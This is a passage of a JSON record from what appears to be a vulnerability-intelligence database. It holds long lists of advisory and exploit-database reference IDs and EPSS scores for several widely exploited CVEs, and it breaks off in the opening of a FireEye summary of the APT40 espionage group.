"THREATPOST:28E43852D5120A3EC8F4720244E0C432", "THREATPOST:29D66B3C46A57CA3A0E13D7361812077", "THREATPOST:29E9543F6EC7903A34D286C6F4391368", "THREATPOST:2A42363A8B070949A25091DE7946F5A2", "THREATPOST:2AFE9BC25DD41D9CF073C8C04B0B1879", "THREATPOST:2BD1A92D071EE3E52CB5EA7DD865F60A", "THREATPOST:2C798ED7D1CE36B13D82410EA1C94D9F", "THREATPOST:2CE017994C889322A1BF0C3F3521DFD7", "THREATPOST:2D47D18D36043D4DFBFAD7C64345410E", "THREATPOST:2D616CF8D8ED2AEB6805F098560269CB", "THREATPOST:2DAD0426512A1257D3D75569F282640E", "THREATPOST:2E13C5A3F37F020F188FBBE61F9209BC", "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "THREATPOST:2F3319136B672CD9E6AB9A17CE42DF1B", "THREATPOST:2FC50917F19F5A13F14EBE274E190CD9", "THREATPOST:30DA1C9D6157103537A72208FA5F0B5D", "THREATPOST:30F4296B03191B6F9433E5DFA9CEBFE6", "THREATPOST:326CCB6EA4E28611AD98B1964CFEE88E", "THREATPOST:3283173A16F1E86892491D89F2E307C2", "THREATPOST:334259E5C4B157E6AC8ADC754BD30D4F", "THREATPOST:35BD4DEE5D1763F5788A6BD1F6AEB00D", "THREATPOST:370DCA5103923FA8965F6D8890D4198F", "THREATPOST:37854AF8C9A75E43ACA98BD95205B6BC", "THREATPOST:379EB96BF0EAF29DD5D3B3140DEF25F5", "THREATPOST:384A1D8040B61120BE2BA529493B9871", "THREATPOST:392CE26C2E3587A54C58FBEC0E26729F", "THREATPOST:3973FA851D33322A013EA1314A1AACC7", "THREATPOST:3AADA643D0F6F1FA8E04B9E2C9F0354B", "THREATPOST:3B27D34858D1F6DE1183C9ABEE8643CD", "THREATPOST:3BA8475F97E24074B27812B9B24AD05F", "THREATPOST:3BDDDA913AECAA168F2B8059EF6BF25A", "THREATPOST:3C3169D334DC65F9EAF925A5796C7ECF", "THREATPOST:3D0B017E262134B8D61E195735411E8A", "THREATPOST:3D30F37EC2CC17D6C3D6882CF7F9777E", "THREATPOST:3D545239C6AE58821904FBF3069CB365", "THREATPOST:3D7F98274EE0CEFF5B22DA72598BE24B", "THREATPOST:3DAB2A56F377207FBFA093C4AC3D52BD", "THREATPOST:3DFDEBADB4BEE8782EFBEA4D06EB5605", "THREATPOST:3E3C8752E39F7A8CA5DD91BD283A79E7", "THREATPOST:3E47C166057EC7923F0BBBE4019F6C75", "THREATPOST:3F2E82624DED93EDD273ABC41E24154C", "THREATPOST:3F9DD13AA9EC2148FD8D14BD00233287", "THREATPOST:40683E270B24D8E2F0A7F7F90FDFE9A6", "THREATPOST:40C7024941C4F0096D439BD79BF49C6D", "THREATPOST:415E19FC1402E6223871B55143D39C98", "THREATPOST:42533F5A68FABB4F312743C2E2A1262A", "THREATPOST:426AA248C0C594BAA81FC6B16FD74B7F", "THREATPOST:42FDB1238D348C4F4A1074DB3091E6F2", "THREATPOST:4397A021D669D8AF15AA58DF915F8BB6", "THREATPOST:43B03902EBB289EABEA3B61E32BF7B7B", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:43C7C5989C2358091F5FA33D11480AEB", "THREATPOST:43EF6CEDCAE06DF2760527AA36C42994", "THREATPOST:440B0C9A3453F28AD6AABD6CD97AA074", "THREATPOST:4474B9334E9322D775C57232CC4127EF", "THREATPOST:44C6EDF349E9D3038D1847321D79E4DF", "THREATPOST:44C93D75841336281571380C5E523A23", "THREATPOST:44FF4D429457B43FB0FEA96C9A0DE58C", "THREATPOST:45A8572FB3BCE9303EDEE2A4783994E3", "THREATPOST:4622EF32C9940819EDA248FBC9C1F722", "THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:483C67752109A3C6AF1920AEA0F63B4C", "THREATPOST:48D622E76FCC26F28B32364668BB1930", "THREATPOST:49045E816279C72FD35E91BF5F87387C", "THREATPOST:490FB5EEC7306F4AF2F0990C85BAB0EC", "THREATPOST:49E24C3D272F18F81C1E207E97168C33", "THREATPOST:4A51D32AF6E154B536858044A8667E45", "THREATPOST:4AB3E2B46281B3DB5FFB51D8F16A11EC", "THREATPOST:4ABC0C904122EBC91D19E8F502931126", "THREATPOST:4AFBF9284A6902E941BE6D95BCD2052E", "THREATPOST:4BAED737182ECF19718520A7258DFDAA", "THREATPOST:4C1556375D297ECC5389073B3ECC185E", "THREATPOST:4C788DAABFE70AE1D1483D4039B3767E", "THREATPOST:4D225F38F43559CB340E0C0C20E1C9BD", "THREATPOST:4DF584EB3FA47CA6245D964EA2A1A2FB", "THREATPOST:4E345D523AA3EF8D5D06880D1063B0C6", "THREATPOST:4F07A726C1A5FB6D0CE8EDF605517CA0", "THREATPOST:4F6F13C74BC6E5EC3C5FF0600F339C90", "THREATPOST:4FA617D4BE1CFDFB912E254229B94E61", "THREATPOST:5083983BB9656C8F9FD41E7297B634C9", "THREATPOST:5170E663982119D9A7AA4064EC71D01D", "THREATPOST:5196DBE4ABD34424DF1F07ED3DA73B12", "THREATPOST:519B278A52BA4200692386F6FAEA43B1", "THREATPOST:519EDC580FCA347C035738F51DB2ABE3", "THREATPOST:51A2EB5F46817EF77631C9F4C6429714", "THREATPOST:51AB3DBBFBFCA1EDCCB83FCECB47C07B", "THREATPOST:5223DD87C6EE62FB7C3723BCCF670612", "THREATPOST:537857B2E29A08953D50AC9EDE93162F", "THREATPOST:537A21C79E24E9981AD8200320B7D46F", "THREATPOST:542C0B0D14A54FEF96D5035E5ABEFEDF", "THREATPOST:551363592C0C853E266999644B3579E4", "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "THREATPOST:55873F60362AA114632D0D7DC95FF63C", "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "THREATPOST:5679ACC257BEC35A3A300F76FA78E8E6", "THREATPOST:575F655420B93C2305DEE73F769E7E0B", "THREATPOST:580280FBECF50DF8FF68F3A998F311D3", "THREATPOST:59732F848538CA26FD0A3AC638F529F9", "THREATPOST:59C4483705849ADA19D341EFA462DD19", "THREATPOST:5A63035EF0BF190E58422B3612EB679F", "THREATPOST:5A8F52C1AE647553C21FA300983F3770", "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "THREATPOST:5B1F1A9A61354738E396D81C42C0E897", "THREATPOST:5BA927C1BD88B4949BDAEC1ACC841488", "THREATPOST:5C4C4351A746ADF8A7F1B2D316888C01", "THREATPOST:5C60BA94DEDFC24233F8B820C7D23076", "THREATPOST:5D03FA1B3C642C5317FB96AFA476DDFA", "THREATPOST:5D9785F30280BD09EB7E645CA2EECE79", "THREATPOST:5DA1737F4321D42086053820C84CCFB0", "THREATPOST:5E4874778A3B5A26CF2755C59BA3A7A8", "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "THREATPOST:616358A88F9C1E69920585FDC717CF1F", "THREATPOST:619AA46DE90E000F02F634A9AA0FB8B0", "THREATPOST:61AC6ABD7798785567FFEEBEF573CDF8", "THREATPOST:61F350907297E5B2EBAE56FF04C054C7", "THREATPOST:6232FE8F8C59D8BBBD6CD0EAAD3D4AA3", "THREATPOST:632A7F4B404E8A9E7D49A4895D573FDB", "THREATPOST:639050E94B84AD3926F64EF305F67AB4", "THREATPOST:63D2355B6EF0B975846E034876BC66DF", "THREATPOST:63EC8A47C53B47DB10146ABB77728483", "THREATPOST:6456A6FCBD57F31DF6ECF8310230973D", "THREATPOST:64EE7E2569B19CDBC1F2000D27D9FC06", "THREATPOST:65B7931A3E49BA24F11CA0CB09743AEA", "THREATPOST:66D2F7851992FD5FC9934A5FE7A68E9F", "THREATPOST:67D34DEB790B708B10391D13A8BE6EAB", "THREATPOST:68D1078BB418B06D989E65C3972EDE28", "THREATPOST:6968030EBEDCF665121F267E466D3BA5", "THREATPOST:69A935F9472525B2FDE94FC33D6C6B70", "THREATPOST:6B8C9E983349C1AA69D5488866DAAC1D", "THREATPOST:6B96C89C11F9A7363A1E592863892D36", "THREATPOST:6C3F577E27FFC413E4196C31436CE13A", "THREATPOST:6C4662EB2B72616C90A201601B18E392", "THREATPOST:6C50260122AE142A1AA28DCFDE4EA98B", "THREATPOST:6CF438E98DFFF4B4057CAFB1382A4D3C", "THREATPOST:6E19885760DF8E9DD66B4F30158CD173", "THREATPOST:6E1A424ADE6EAAA732FBE0027DD6F97F", "THREATPOST:6E270592F88355DEABA14BF404C7EDDE", "THREATPOST:6E2DD8B76555337B1AB3A01AE147EA68", "THREATPOST:6E46A05627B4B870228F4C53DD7811AE", "THREATPOST:6EBEA4CC58A28C7B7DEE65B4D6FDA976", "THREATPOST:70B08FC40DE9224ACE3D689EE22897C0", "THREATPOST:714DD68C5B32F675D9C75A67D7288B65", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:71D015FE251ED550B92792FF72430841", "THREATPOST:738BF7215D8F472D205FCBD28D6068E5", "THREATPOST:742E793D712CB6B2F049DBEA5373016E", "THREATPOST:75108516B2230B2FA175C2B84083F4DF", "THREATPOST:752864660896CF677AF67798E68952F0", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:7642BB12A1C6458D5DDB7202B6BF1D62", "THREATPOST:765141925BCF61E1BEC4EA2E7E28C380", "THREATPOST:769E9696F176FD575D7F365CA771EFC3", "THREATPOST:7719EB430C620858B2504EA847A9A096", "THREATPOST:77E27FE5A07B4C4146B818CE438E0AAA", "THREATPOST:78B8BC1F232A077BA4B03580A37C0780", "THREATPOST:78CC95FFED89068ABD2CBA57EFE1D5F8", "THREATPOST:794EAB73A376A35B810DFA241137B6D2", "THREATPOST:7957677E374E9980D5154F756D4A2E00", "THREATPOST:7A640DBB2223135AD8DC65457AB55EBF", "THREATPOST:7ACEE8004906A83F73EF46D8EE9A83F3", "THREATPOST:7B2EAFA107D335014D553D78946C453E", "THREATPOST:7BE818C547990FA7A643DE9C0DE99C8C", "THREATPOST:7D0B88F224FD59AB5C49F030B02A25D9", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7D2F975F60C58181C3B6726E809F10FD", "THREATPOST:7D30EC4B25275AFBC409D8619D125E65", "THREATPOST:7D43FDAB0FB38B20FBB86FFF6FD31270", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:7E30033E60118E5B4B8C14689A890155", "THREATPOST:7E324E4AFB9218DCC9509FB4E2277400", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7E6EDF53838EEFD3BEAC32130CE58C38", "THREATPOST:7E76268AD6AABF30EEE441619FF98ABF", "THREATPOST:7F4C76F7EC1CB91B3A37DE64274F1EC3", "THREATPOST:7F86D903184A4B5AF689693F5950FB7D", "THREATPOST:7FF462EBFF86BEB1E7C8207D6CB07E50", "THREATPOST:7FFF8255C6708C32B41A2B0FBFEBA9B0", "THREATPOST:80110ABE631D4720D6EECA161FFCE965", "THREATPOST:80978215EBC2D47937D2F3471707A073", "THREATPOST:809BED35A98A53099CE1EC723FA950F2", "THREATPOST:80D12F3888B999E484D206D5EBA9EEA0", "THREATPOST:816C2C5C3414F66AD1638248B7321FA1", "THREATPOST:828471E05035E11C0ED67C67E1EA8F0D", "THREATPOST:848870C5AD3BB637321291CEF571A5F9", "THREATPOST:849E78B2F5C0D699337829FD6D6F8AE4", "THREATPOST:84E8993BD84BB1AAEE4273958FF69EDF", "THREATPOST:8549E725CF51C109F7299A0CC5FACBE9", "THREATPOST:856DD01A5D951BB0E39AE06B64DDD2A7", "THREATPOST:85DCC5523A4DCF507633F07B43FE638A", "THREATPOST:85DEC97DDAF4F3EBF731C2724329904B", "THREATPOST:88071AD0B76A2548D98F733D0DD3FE1A", "THREATPOST:8836AC81C1F2D9654424EC1584E50A16", "THREATPOST:88A5449B2DE22E7A3AD1C820BEDE1109", "THREATPOST:88C99763683E42B94F1E7D307C0D9904", "THREATPOST:8A24910206DA1810DAD81ABA313E33A7", "THREATPOST:8BA8EF04040D5048287D9AFFAD778130", "THREATPOST:8C45AF2306CB954ACB231C2C0C5EDA9E", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:8D91C617AB6DA9813465DF309507F9F5", "THREATPOST:8E01B2E26F588D0FA5B0857DCEF926DA", "THREATPOST:8E47F9D5A51C75BA6BB0A1E286296563", "THREATPOST:8EC1069E3114E28911EA3438DA21B952", "THREATPOST:8F39618B0CB625A1C4FC439D0A7C4EB9", "THREATPOST:8FAA8C7C7378C070F0011A0B44C03726", "THREATPOST:8FACBD9A4509F71E19E07BB451FD68A0", "THREATPOST:90355E85731E1618F6C63A58CD426966", "THREATPOST:937A7A291D84404C800DF20ADBE20BC1", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:945830C59DF62627CC3D29C4F9E9139F", "THREATPOST:945A12FF5F8B6420706F2E174B6D0590", "THREATPOST:9530BF61FA72CF3E2B226C171BB8C5E7", "THREATPOST:95C6723464FA4BDF541640AC24DD5E35", "THREATPOST:967CD2B765C5CD02EC0568E4797AF842", "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "THREATPOST:96B85F971B8102B581B91984548004F2", "THREATPOST:96C5FAF7B7238F498D3BFD523344AA56", "THREATPOST:9758835CBD1761636E1E39F36A79936B", "THREATPOST:9812AA10EEA208EA87CD37C5F28D927F", "THREATPOST:985009AC9680D632153D78707A8949EF", "THREATPOST:98BE42759F35CD829E6BD3FAC7D5D1D5", "THREATPOST:99610F4016AECF953EEE643779490F30", "THREATPOST:9A9D21304DF605E55290BEAB2BDF62C5", "THREATPOST:9AA382E93ED0C2124DD69CF4DDC84EB7", "THREATPOST:9AE8698D8AABA0F11676A29CECC6D7BA", "THREATPOST:9B11E0EF22481CA407924C58E8C7F8C1", "THREATPOST:9B936E81D7DD33C962D98A85BAF3B7FE", "THREATPOST:9C03EBE552C67EF6E62604A81CF13C1A", "THREATPOST:9C0FA678FF748B08478CA83EAAEF83B4", "THREATPOST:9CD19A6A1B939482B336348DA5D2F47C", "THREATPOST:9D048A14622014274EB5C5D19FEDD46A", "THREATPOST:9DAD31CF008CF12C5C4A4EA19C77BB66", "THREATPOST:9E1DE5C0DB7F1D8747AD52E14E4C8387", "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:9FE968913EDA58B2C622DFD4433C05E0", "THREATPOST:A054939E56572665B8DD31C2FF1D6A79", "THREATPOST:A0EA2808DE56569B593A4E0254EC09CD", "THREATPOST:A1A03F8D19A1212209F2765F29BE892C", "THREATPOST:A21BD1B60411A9861212745052E23AE7", "THREATPOST:A29172A6F4C253F7A464F05CCE4E3ABB", "THREATPOST:A298611BE0D737083D0CFFE084BEC006", "THREATPOST:A2C4DFB7FD998E1990946FBDE70D8050", "THREATPOST:A2FCDF5F534EC09A258F3193FDEA41A8", "THREATPOST:A3218B82F449C5905D1957A1C264C1C1", "THREATPOST:A45826A8CDA7058392C4901D6AAD15F1", "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "THREATPOST:A60A7647981BC9789CAECE6E9BADD30E", "THREATPOST:A617AB8E3147511D6E87F9782597BB64", "THREATPOST:A653527FBB893B6568AF6B264422BD7A", "THREATPOST:A6CEBF30D4D0B3B54DC8E78CC21EBA4B", "THREATPOST:A7710EFC5AA842A252861C862A3F8318", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:A7D014F320A68BD2D7BEA7FCB9349FC0", "THREATPOST:A824AE46654142C5CE71C8DDFD90D548", "THREATPOST:A844D1411E7339911EECDDBD5596A9E7", "THREATPOST:A959F2AFFE1161A65066EACCFB0D5FCA", "THREATPOST:A9E6DBBE61D0494D0B0C83151FEC45D0", "THREATPOST:A9EF092F5BA25CAD6C775AAE60BC318E", "THREATPOST:A9FAA9D15FCD97151072CF8CE16A42D9", "THREATPOST:AA7C9EFD06F74FBC5580C0384A39AA56", "THREATPOST:AACAA4F654495529E053D43901F00A81", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", "THREATPOST:ABA04F8289071D7B10CAE4202D0EB18E", "THREATPOST:AC7105820BB83340E9C002EE77D4B8D6", "THREATPOST:ACF4961C0305F2447E96F09C6C460079", "THREATPOST:AD20F9744EB0E2E4D282F681451B4FBD", "THREATPOST:AD3C2C361C6E263CA6B217D740D6C09F", "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:AD96628DA2614402CC9BDEF93704870B", "THREATPOST:AE4AEC18802953FE366542717C056064", "THREATPOST:AE6ADD184BCB4B6C0DCF53BEE513E9DD", "THREATPOST:AFCEAC73B5337D8E7C237914CF84FC01", "THREATPOST:B051AFA0F0705404F1CD22704980AE7F", "THREATPOST:B1F3641CBE3AF60ECA85E3ADE7AE53CA", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B34044D3D29EE756187C0D5CDF2E19B8", "THREATPOST:B3C0097CBA4C334709D99BB9D477A6DD", "THREATPOST:B450AFC35B78A62F536227C18B77CB4E", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B4AED814955E51C42BAE9BF0A3A014B0", "THREATPOST:B4B23ADD1522DC53A0B05300F439AB03", "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "THREATPOST:B5B59F74FDFACADB44DBF4AE420E3189", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:B62AA49BBB410F8D7406ABE4E3C4C62F", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:B71BC1DE86D81D6B48969567186B0622", "THREATPOST:B7280795B2A42655BE9618D06EB9520A", "THREATPOST:B7E1238E416DAB5F50EED6E4CC347296", "THREATPOST:B7F31FCDC8936516C077D39FEF9235AA", "THREATPOST:B8B49658F96D885BA4DC80406A2A94B3", "THREATPOST:B8EE84454BCC4614F524D8A4901907C3", "THREATPOST:B956AABD7A9591A8F25851E15000B618", "THREATPOST:B991F2CF870C98BD40B817DE3CDF52A0", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BAC3CD99B74F1D6CD22A123ED632AA3F", "THREATPOST:BB432D74FB2DC755C74CBEE5CF71B1E9", "THREATPOST:BB95F65906A69148A31A208D15B5EFC3", "THREATPOST:BBF9233468A677A95C5E9D149089804E", "THREATPOST:BC14FD8D22AC2C22C164C5B8B0E36C05", "THREATPOST:BD9CDF08D7870033C1C564691CABFC16", "THREATPOST:BDA1752A66AD0D3CF8AB59CFB7A8F472", "THREATPOST:BDAFE3A8671CEAB24C02FF18A8FBA60F", "THREATPOST:BDE4A24DFC0713FBC25AB0F17931717C", "THREATPOST:BE68C6E4335F8D5EEAEFCE1E8553C4C8", "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:C0872257AF615C3542B0C9F0BAE4A57D", "THREATPOST:C1850156F9F2124BACDC7601CCFA6B30", "THREATPOST:C35731BF3D4A3F8D0B1A838FAD1A8832", "THREATPOST:C442C6ABA3916CAA62C89BC2CB6332CD", "THREATPOST:C47E4314F4EEB30F0139DF3BC8B47E01", "THREATPOST:C4DD63E36CE4313386CAB54222BDD07A", "THREATPOST:C535D98924152E648A3633199DAC0F1E", "THREATPOST:C56525805A371C56B68CE54AB4EDB9AF", "THREATPOST:C5D967CF7CFD8422FD9ACFC1CF7277A6", "THREATPOST:C6DD041BAAC1DCF6C44CCBD19C9F1F13", "THREATPOST:C8BB08507CBCCE4C217C33C15D3AA04D", "THREATPOST:C9B3ABEF738D9A1E524FB94613BA5CBA", "THREATPOST:C9C5B1554A6F4216A73108C0748E16EF", "THREATPOST:CB62075A4B035B08FDA602FF702FBB71", "THREATPOST:CC82779FBE47FD3E64708FE6233C3DAD", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:CDCABD1108763209B391D5B81AE03CF7", "THREATPOST:CDDC2C11CF6377AB44508254B9FB36DA", "THREATPOST:D053D0BAA76AC62C5AFCB77CBFD61B6D", "THREATPOST:D11D4E32822220251B14068F9BAAD17E", "THREATPOST:D1D63DCBBB39C340EEEDB2544F4C7DB3", "THREATPOST:D292185F5E299FDB7366DDAA750D6070", "THREATPOST:D3F6B40A3A2EF494FE7F0AFC7768F7CD", "THREATPOST:D40D286C87360AFDC61FCD9AD506D78F", "THREATPOST:D49075D6FFF077A542015B7F806F4E27", "THREATPOST:D4C8CD7D146990740B8339D88A3FDB84", "THREATPOST:D55054CEF7EC85590BCAC2F18EED6FFC", "THREATPOST:D587192A5DA9FB1680FF9D453F96B972", "THREATPOST:D58796CB8261B361ADF389131F955AE3", "THREATPOST:D5CE687F92766745C002851DFA8945DE", "THREATPOST:D6D859A31F73B00E9B6F642D4C89B344", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:D8172FCB461F5843B3391B2336A4D02F", "THREATPOST:D8CDE16C2F1722831D3106563D1F1551", "THREATPOST:D9C08A737D3D95BFF6B07A04C9479C6D", "THREATPOST:DB438BDD32A19C608E74D09992D53881", "THREATPOST:DBD7145D5FE0AE34B1D653D25DF60AE8", "THREATPOST:DC3489917B7B9C6C1824FB61C05E82CD", "THREATPOST:DC91E1B2D30C1A0D1ED78420E79DCE86", "THREATPOST:DCEC8DA2CC98CD3F9DF8B10773BD6F01", "THREATPOST:DD69574508B1751B9C9B01C26AE809C1", "THREATPOST:DD7A2F272ACFDE71B0A0CEC234C35876", "THREATPOST:DDDE126E49EC98A6A15655F564E25620", "THREATPOST:DEDA9E6DCA21010A215B158BFF80253C", "THREATPOST:DF45F7CBB6E670440E0A14E517EA753D", "THREATPOST:DF54323828EEC1DDCE4B2312AC6F085F", "THREATPOST:E067CFBFA163616683563A8ED34648FE", "THREATPOST:E068C231265847BA99669A8EBF0D395D", "THREATPOST:E1C629434DE943EAA7BD57B1F6EEA7E2", "THREATPOST:E1CCA676B9815B84D887370ABFDEE020", "THREATPOST:E22E26BB31C17ACCC98C59076AF88CD7", "THREATPOST:E44D0A1C3C7C76586EBC905270FFAC34", "THREATPOST:E46805A1822D16B4725517D4B8786F57", "THREATPOST:E4FBCA31AB2D69F0292283738E873960", "THREATPOST:E539817E8025A93279C63158F37F2DFB", "THREATPOST:E65917E5AE555B95E6FFBD69E00E682D", "THREATPOST:E6DC1F407BA6CEE26FE38C95EBB10D7A", "THREATPOST:E77302403616F2E9A6C7DA2AD2B1F880", "THREATPOST:E7C5C8276111C637456F053327590E4C", "THREATPOST:E937B281CB0B5D1061AAD253FA4ACB53", "THREATPOST:EA5D6454E04EAFE2D10FDC5BD6D23F81", "THREATPOST:EA8274414AC42B3EF48CA27D45659736", "THREATPOST:EC55500DAF9E1467C9C94C82758F810C", "THREATPOST:ED7B090DD1289553529F8B6FD87BF467", "THREATPOST:EE14785AC189E016FD2CE51464D3643D", "THREATPOST:EE5FF4DE95B4AED68C90DCB6444B6560", "THREATPOST:EF7DCA1CE0B1A1B1D93B4E4F7A3A3163", "THREATPOST:EF898143DB86CE46FFBDC81DCD8E79AA", "THREATPOST:EFE8A853C0EEF9ED023CC92349BE9410", "THREATPOST:F158248C80174DD4B29AE26B4B4139C0", "THREATPOST:F19F70E263B2C3D2A16C72D12F9884FC", "THREATPOST:F1E0D1BF5C51CAA730D94DB196D962D1", "THREATPOST:F261FA3F1DECA361A6DBC169065B1101", "THREATPOST:F28846A403C73C488A77B766A21BB3E5", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "THREATPOST:F514D796FE42C0629BD951D8664A2420", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:F61F8A6168C36EAB1584BC8044080B35", "THREATPOST:F68D705DC9A7663E4BF22574470F51D7", "THREATPOST:F701F7503777655BB413FCBEFB88C8DE", "THREATPOST:F73CA4042B0D13ED4A29DED46F90E099", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "THREATPOST:F9FEB3F0862AAD4CC618F9737F44FA7B", "THREATPOST:FADCF664C06E3747C40C200AE681FDF8", "THREATPOST:FAE0DDDC6420E9881C1D719E13B77095", "THREATPOST:FB6C6CE8F3B4AE6846C8AB866C36F024", "THREATPOST:FBDE9552D48B698542D65DEA64890566", "THREATPOST:FBF1F4B1FB26C8B1E95965E920F985EF", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1", "THREATPOST:FCB99D1A395F7D2D1BFD9F698321FA04", "THREATPOST:FCF1B008BD9B10ADDA0703FDB9CBAA04", "THREATPOST:FD699B5CBB882E8FB3DDF3341B557D27", "THREATPOST:FEAE151B1861BE9EF40E606D5434AE00", "THREATPOST:FF75AF79B23F8B0D0CF546FC055B7911", "THREATPOST:FF8B5ACCCE8A1CE6B8A830B1D3E9E316", "THREATPOST:FFB8302BEBD76DDACC5FD08D3FF8F883"]}, {"type": "trellix", "idList": ["TRELLIX:B73136D0B1874E13EB839E42FB157903", "TRELLIX:C3BC4A8730F3B1E4C9A82C07C31138D4", "TRELLIX:CC89DE5CDC16462BF1BBC90EE93DEE24", "TRELLIX:D3CC9DD7452C6A1D346229DE526BBE46"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:08ADD009C78AC2B7B49C47D2673AD447", "TRENDMICROBLOG:0B24CF652B6ADAB5E1BE333A26A02E21", "TRENDMICROBLOG:1C7972C77614398819AB69B2345DA453", "TRENDMICROBLOG:1FEAB54A2EB3929007298481113A7219", "TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03", "TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28", "TRENDMICROBLOG:5DA0AA0203F450ED9FF0CB21A89017BB", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:71F44A4A56FE1111907DD39C26B46152", "TRENDMICROBLOG:D07F262A5F92BE131EF59AA1DD863465", "TRENDMICROBLOG:E3C3B5620EF807FF799CC5A969324BF2"]}, {"type": "ubuntu", "idList": ["USN-4773-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-5638", "UB:CVE-2018-4878", "UB:CVE-2018-7600"]}, {"type": "veracode", "idList": ["VERACODE:3644", "VERACODE:6042", "VERACODE:6198"]}, {"type": "vmware", "idList": ["VMSA-2017-0004", "VMSA-2017-0004.7"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:115E09DAC149F2CA9466BA7550E0A5FE"]}, {"type": "zdi", "idList": ["ZDI-19-181"]}, {"type": "zdt", "idList": ["1337DAY-ID-27300", "1337DAY-ID-27316", "1337DAY-ID-27607", "1337DAY-ID-27613", "1337DAY-ID-27617", "1337DAY-ID-27662", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-28535", "1337DAY-ID-28811", "1337DAY-ID-29022", "1337DAY-ID-29119", "1337DAY-ID-29702", "1337DAY-ID-30119", "1337DAY-ID-30171", "1337DAY-ID-30199", "1337DAY-ID-30200", "1337DAY-ID-30268", "1337DAY-ID-30431", "1337DAY-ID-30432", "1337DAY-ID-33140", "1337DAY-ID-33313", "1337DAY-ID-33794", "1337DAY-ID-33806", "1337DAY-ID-33824", "1337DAY-ID-33895", "1337DAY-ID-33951", "1337DAY-ID-38189", "1337DAY-ID-38193", "1337DAY-ID-38195"]}]}, "epss": [{"cve": "CVE-2012-0158", "epss": 0.97314, "percentile": 0.99769, "modified": "2023-05-01"}, {"cve": "CVE-2015-1641", "epss": 0.96944, "percentile": 0.99538, "modified": "2023-05-01"}, {"cve": "CVE-2017-0143", "epss": 0.97391, "percentile": 0.99846, "modified": "2023-05-02"}, {"cve": "CVE-2017-0199", "epss": 0.97449, "percentile": 0.99908, "modified": "2023-05-01"}, {"cve": "CVE-2017-11882", "epss": 0.9743, "percentile": 0.99887, "modified": "2023-05-02"}, {"cve": "CVE-2017-5638", "epss": 0.97548, "percentile": 0.99991, "modified": "2023-05-01"}, {"cve": "CVE-2017-8759", "epss": 0.97356, "percentile": 0.99803, "modified": "2023-05-02"}, {"cve": "CVE-2018-4878", "epss": 0.9749, "percentile": 0.99948, "modified": "2023-05-02"}, {"cve": "CVE-2018-7600", "epss": 0.97571, "percentile": 0.99998, "modified": "2023-05-01"}, {"cve": "CVE-2019-0604", "epss": 0.97436, "percentile": 0.99894, "modified": "2023-05-02"}, {"cve": "CVE-2019-11510", "epss": 0.97517, "percentile": 0.99972, "modified": "2023-05-02"}, {"cve": "CVE-2019-19781", "epss": 0.975, "percentile": 0.99956, "modified": "2023-05-02"}], "vulnersScore": 10.0}, "_state": {"score": 1695455243, "dependencies": 1695454967, "epss": 0}, "_internal": {"score_hash": "14f16c0b6e2bf2c8cb281d5a1d66c2d0"}}

{"fireeye": [{"lastseen": "2020-10-02T10:01:23", "description": "FireEye is highlighting a cyber espionage operation targeting crucial technologies and traditional intelligence targets from a China-nexus state sponsored actor we call APT40. The actor has conducted operations since at least 2013 in support of China\u2019s naval modernization effort. The group has specifically targeted engineering, transportation, and the defense industry, especially where these sectors overlap with maritime technologies. More recently, we have also observed specific targeting of countries strategically important to the Belt and Road Initiative including Cambodia, Belgium, Germany, Hong Kong, Philippines, Malaysia, Norway, Saudi Arabia, Switzerland, the United States, and the United Kingdom. This China-nexus cyber espionage group was previously reported as TEMP.Periscope and TEMP.Jumper.\n\n#### Mission\n\nIn December 2016, China\u2019s People 